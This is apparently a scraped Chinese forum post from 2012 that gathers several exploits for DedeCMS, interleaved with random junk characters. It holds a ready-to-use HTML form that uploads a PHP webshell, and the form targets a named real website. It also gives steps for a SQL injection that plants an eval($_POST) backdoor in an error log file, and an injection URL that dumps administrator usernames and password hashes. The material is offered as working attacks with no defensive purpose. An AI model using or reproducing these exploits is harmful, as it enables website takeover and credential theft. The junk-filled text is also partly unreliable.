<body style="FONT-SIZE: 9pt">
! P$ I" N- A% V$ L8 o---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
J7 U0 z+ {$ Y5 e<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
% T3 r7 `2 E% h' x<input type='hidden' name='activepath' value='/data/cache/' />% |/ M* M% @3 p4 f5 m, E/ @
<input type='hidden' name='cfg_basedir' value='../../' />
y; b7 W4 @( O* O; @) v% I/ Q<input type='hidden' name='cfg_imgtype' value='php' />
f+ \0 z# }) i, t8 W* \+ P8 N<input type='hidden' name='cfg_not_allowall' value='txt' />& a! T, R/ Q: K& X5 j
<input type='hidden' name='cfg_softtype' value='php' />+ e3 e$ s+ r. A) a
<input type='hidden' name='cfg_mediatype' value='php' />) s0 P1 _$ S' J5 }6 P+ Z2 K9 b
<input type='hidden' name='f' value='form1.enclosure' />
$ \1 B8 A2 W# ~! q j9 t<input type='hidden' name='job' value='upload' /># d5 h0 ]8 O2 ~9 T# O4 q! s' h4 S- r
<input type='hidden' name='newname' value='fly.php' />
0 U6 B4 F; {3 c) QSelect U Shell <input type='file' name='uploadfile' size='25' /># C3 ]/ T, G! L
<input type='submit' name='sb1' value='确定' />1 p2 ~" |4 z5 \4 Y4 M8 U, n
</form>
9 n, Y' Q9 Z* ^<br />It's just a exp for the bug of Dedecms V55...<br />
5 T5 u1 b0 @6 u" rNeed register_globals = on...<br />
6 y1 {! i3 j4 ?# n+ x* r3 zFun the game,get a webshell at /data/cache/fly.php...<br />3 m0 d! N4 j" B! ?
</body>
! {, o3 l4 x# e, J& S</html>: [& H) J9 r% f- C; u$ C) y
7 x' l) I7 Y( x1 J, h" V6 F0 L" F4 }8 K" A" H6 x6 \
5 u0 ^; P8 q" q
; O8 V+ o, U- \" }# S' {3 q7 Y2 Q' q$ E8 y* h) u
* J! C% b6 D5 r* ~ X* X6 o9 J
1 s7 b t7 I1 m* i4 `/ t+ z4 _9 Y: p ~4 h$ c u9 c+ E
5 E6 R' d' K* \7 V( Y6 H
9 e8 P0 X1 n, l* O# `# G0 r9 q织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
V, S9 B# L' ]5 [7 E5 M/ G" u利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
: v: q5 R% X6 |$ ]1. 访问网址:5 N& I' [0 O9 K$ H" h$ B
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?> I/ ` x( F0 s! T
可看见错误信息" `- T. H$ a* B
. n: q+ o h" |) U. E) i! Q, N
/ f+ |1 `1 o& j/ `# R; T2 r: k
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。 b" S# l$ b! o$ g# B8 @& K) S
int(3) Error: Illegal double '1024e1024' value found during parsing3 N6 `+ s- w+ W$ `3 ?
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
2 [" n( |8 ~' I; k0 }3 F9 j
/ Q6 I2 R3 S# b+ h' u; f$ X2 H& T2 Q" v3 z7 O8 V' y8 U( y4 L
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是9 {9 I2 w1 D5 M3 F0 G
$ Y! P8 G. D' ?& @% C# s
5 u: `5 y) E4 b<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
6 f& G- j. z6 E, G6 D% g* _! ]
- C* k) S8 A+ @
按确定后的看到第2步骤的信息表示文件木马上传成功., w" V6 n b$ v5 ^+ u% Y
2 v( a/ t# A7 ?0 ~6 H
. S$ S: w. v+ H8 c4 Y
, j) h1 X5 J& O+ ^
- r# x o& g, S3 {* j2 ^4 K1 l S7 y2 E* ?, X
' g5 t. B1 U) g$ M
% X* D; y0 n# Y- S& G: R* ?
1 l" t4 G4 Y( }0 }
7 Z, P$ L+ u8 n8 h+ J) K! c. s
; q8 y0 t1 i- T; V! G
/ V0 N6 R6 J# V6 z! }$ j* i
' {) E$ ?8 ]# V# w( ~! a织梦(DedeCms)plus/infosearch.php 文件注入漏洞
1 D! n% N; m* Y6 [; |7 v0 Ahttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对